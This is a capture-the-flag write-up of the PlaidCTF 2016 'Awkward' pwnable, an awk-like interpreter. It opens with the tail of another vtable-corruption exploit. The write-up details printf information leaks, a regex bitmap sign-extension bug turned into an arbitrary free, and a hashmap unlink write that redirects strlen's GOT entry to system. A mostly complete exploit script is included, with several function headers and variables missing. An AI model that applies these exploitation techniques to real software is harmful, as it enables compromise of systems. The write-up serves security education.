if i == 0 or i == len(leak_3) - 1: continue
if leak_3[i-1] != 0 and leak_4[i-1] != 0 and a == 0 and b != 0 and leak_3[i+1] == 0 and leak_4[i+1] == 0:
my_vtable = leak_4[i] + 4
print 'my_vtable @ ' + hex(my_vtable)
break
else:
print 'couldnt find my_vtable'
return False

# now we can just corrupt the existing vtable to point to our fake one
VERBOSE = True
update[vtable_index] = my_vtable
update_item = current_item
allocate_item(2040, update); current_item += 1

operation_5(0, update_item)

# invoke exit, to trigger the atexit handler to trigger the virtual call
free_item(100)

# read forever, dumping output to stderr (hangs)

while True:
# hangs if successful
try_to_win()```

# PlaidCTF 2016 – Awkward [Pwnable 600]

Awkward was an exploitation challenge, providing a pretty serious “awk” like interpreter, with a variety of different bugs.

I used IDA and Hex-Rays extensively to reverse it.

After a bit of reversing, I got it running simple programs like this:

```START { }
FINISH { printf "%d", 1; }
```

And, mostly by lucky guess found the information leak vulnerability, where printf failed to check types, allowing leaking heap addresses with:

` printf "%x", "string";`

` printf "%s", 12345678;`

This was all I had for probably 10 hours. I reversed most of the interpreter, the hash-map, deeply investigated some weird behaviour with regards to string splitting, field-separators and string joining. Nothing. Eventually I found another (probably unintended) information leak vulnerability, which looked like:

` "string"; x = y;`

If y was an uninitialized variable, x would become the address of “string”.

Finally, and somewhat apprehensively, I embarked on reversing the last remaining component: the regex engine. Finally, I found the corruption bug – when parsing character sets ([abc] notation), the byte values were being sign-extended before writing bits into a bitmap.

(v24 is an int, from a sign-extended character)

This allowed setting bits before the start of the bitmap using bytes 80 to FF. This allows only a handful of fields to be corrupted. Long story short, there was a “next” pointer field which was initialised to NULL earlier in the structure. I could write into it bit-by-bit, and as long as it was the last thing in the regex it would keep the new value (otherwise it would be overwritten by a real next value).

I took some notes on which byte values mapped to which bits, just by trying it and looking at the crash address in gdb, and eventually figured out the rules. I probably should have used a mathematical approach to calculate it, but sometimes it’s safer to just trust what you can see:

``` # NOTE: 0xC0 -> 1
# NOTE: 0xB9 -> 2
# NOTE: 0xBA -> 4
# NOTE: 0xBB -> 8
# NOTE: 0xBC -> 10
# NOTE: 0xBF -> 80
# NOTE: 0xC8 -> 100
# NOTE: 0xC1 -> 200
# NOTE: 0xC2 -> 400
# NOTE: 0xC7 -> 8000```

I combined it into the following python for setting an arbitrary address:

``` target = 0x12345678
lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
[0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
chrs = ''
for i in range(0, 32):
if target & (1 << i):
chrs += chr(lookup[i])
print 'print ' + str(i) + ', "hello" ~ /[' + chrs + ']/;'```

I spent a few hours poking around different options for what to confuse with a “next” node before realising that if the first byte is a safe value it doesn’t crash and just frees the provided address.

I spent longer pondering what I should free before deciding on the “fields” array (pretty much the only array the code can access). This is an array of char* that is initialised by splitting the input line, but you can reallocate it to be a pretty arbitrary size by assigning to it. You can then write pointers to arbitrary strings into it. Pretty convenient, right?

I found the address of the fields array by leaking some strings on either side of it in the heap and adding a constant offset:

``` str = "aaaabbbbccccddddeeeeffffgggghhhh";
# duplicate the string and get its address a few times
str; q = z;
str; r = z;
str; s = z;
str; t = z;
# reallocate fields array
\$128 = "1";
# get one after it for reference
str; u = z;
printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;
x = t + 112;
printf "fields array: %x\n", x;```

I then rewrote my arbitrary-free to use awk to construct the regex:

``` code = 's = "he[";\n'
lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
[0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
for i in range(31, -1, -1):
code += 'if (x >= ' + str(1<<i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1<<i) + '; }\n'
code += 's = s "]";\n'
code += 'print "hello" ~ s;\n'```

So, this is enough to free the fields array, but I needed to turn it into an arbitrary write. I chose to use the linked list removal operation of the variable hashmap for this (a super awkward technique, as you’ll see).

Once the fields-array was freed, I declared a new variable to reallocate the variables hashmap into the freed memory (and I declared enough variables earlier to make sure that this would cross the 70% threshold on line 61).

Because I could leak the address of arbitrary string data I could construct some very complex structures in memory. I used this to create a fake hashmap_entry structure, with the name pointing to a real name string. I inserted this structure in the correct slot in the hashmap by writing into the fields array, then declared a real variable with the same name, running the unlinking code in the listing above.

I wanted to use the code on line 38 write to an arbitrary address, but unfortunately the “next” address had to be a valid address as well. To solve this I leaked the address of a large string in memory, and chose offsets into the string to control the low byte of the address. This allowed an arbitrary pointer to be written by repeating the “unlinking” primitive four times (increasing the write address each time).

I used the printf leak to leak the address of strlen from the GOT then added an offset to find the address of system (since my local libc was the same), and used the unlinking technique to replace the value. strlen was used by printf when printing strings, so after corruption I could get the flag by writing:

` printf "%s\n", "cat flag\n"; `

## Full Code

The full code for my exploit (in all of its hasty awkward messiness) is listed below. It has a few more tricks that hopefully don’t need too much explanation. I’m afraid I used a rather inappropriate variable name (after 20 hours of hitting my head against this problem I was a bit frustrated), and then hardcoded the hash value making it too error-prone to change after the fact. Sorry.

```import socket
import struct
import random
import string
import time
import sys

VERBOSE = True
VERBOSE = False

buf = sock.recv(1)
if not buf:
raise EOFError
return buf

s = ''.join(read_byte() for i in range(n))
if VERBOSE:
print '<', `s`
return s

s = ''
while not s.endswith(sentinel):
if VERBOSE:
sys.stdout.write(repr(b)[1:-1])
if b == '\n':
sys.stdout.write('\n')
sys.stdout.flush()
s += b
return s

def send(s):
if VERBOSE:
print '>', `s`
sock.sendall(s)

program = '''
BEGIN { }
{
FS = "xyz";
if ( \$1 == "r" ) { printf ">>>%s<<<\n", 0 + \$2; }
if ( \$1 == "a" ) { printf ">>>%d<<<\n", \$2; }
if ( \$1 == "s" ) { saved0 = \$2; saved1 = \$3; saved2 = \$4; saved3 = \$5; }
if ( \$1 == "l" )
{'''
for i in range(5):
program += "padding%d = \"0\";" % i;
program += '''
str = "aaaabbbbccccddddeeeeffffgggghhhh";
str; q = z;
str; r = z;
str; s = z;
str; t = z;
\$128 = "1";
str; u = z;

print q;
printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;

x = t + 112;
#x = 305419896;
printf "freeing %x\n", x;

s = "he[";
'''
lookup = [0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) + [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8)
for i in range(31, -1, -1):
program += 'if (x >= ' + str(1 << i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1 << i) + '; }\n'
program += '''
s = s "]";
print x;
print s;
print "hello" ~ s;
realloc = 1;
\$50 = saved0;
print "alive";
fuck = 1;
print "alive?";

\$50 = saved1;
print "alive";
fuck = 1;
print "alive?";

\$50 = saved2;
print "alive";
fuck = 1;
print "alive?";

\$50 = saved3;
print "alive";
fuck = 1;
print "alive?";

printf "%s\n", "cat flag\n";
print "alive??";
}
}
FINISH { }
'''

#0xf75cb180 <system
#0xf7607690 <strlen

send(program)

send("rxyz%d\n" % (a,))

assert ' ' not in a and '\n' not in a
send("axyz%s\n" % (a,))

r = ''
while len(r) < n:
return r

strlen_got = 0x8052040

system = strlen + (0xf759b180-0xf75e13c0)
print hex(strlen)

junk_string = 'a' * 1024

def generate_block(write_to, byte):
target = (scratch_start + 256) & ~0xFF
next_in_chain = prev_in_chain = next_ = prev = cache = target + byte
type_ = 0x41414141
value = 0x41414141

next_offset = 0x8
prev = write_to - next_offset

print map(hex, (next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache))
return struct.pack('IIIIIIII', next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache);

def do_hash(name):
h = 0
for i in name:
h = ord(i) + 1337 * h
return h

def save(a,b,c,d):
for s in (a,b,c,d):
assert '\n' not in s, `s`
assert 'xyz' not in s, `s`
assert '\0' not in s, `s`
send("sxyz%sxyz%sxyz%sxyz%s\n" % (a,b,c,d))

print do_hash('fuck') % 64

save(
generate_block(strlen_got, (system & 0xFF)),
generate_block(strlen_got+1, ((system >> 8) & 0xFF)),
generate_block(strlen_got+2, ((system >> 16) & 0xFF)),
generate_block(strlen_got+3, ((system >> 24) & 0xFF)),
)
raw_input('attach?') # ps aux | grep ' ./awkw' | grep -v grep | cut -c10-15
send('lxyzaxyzb\n')
VERBOSE = True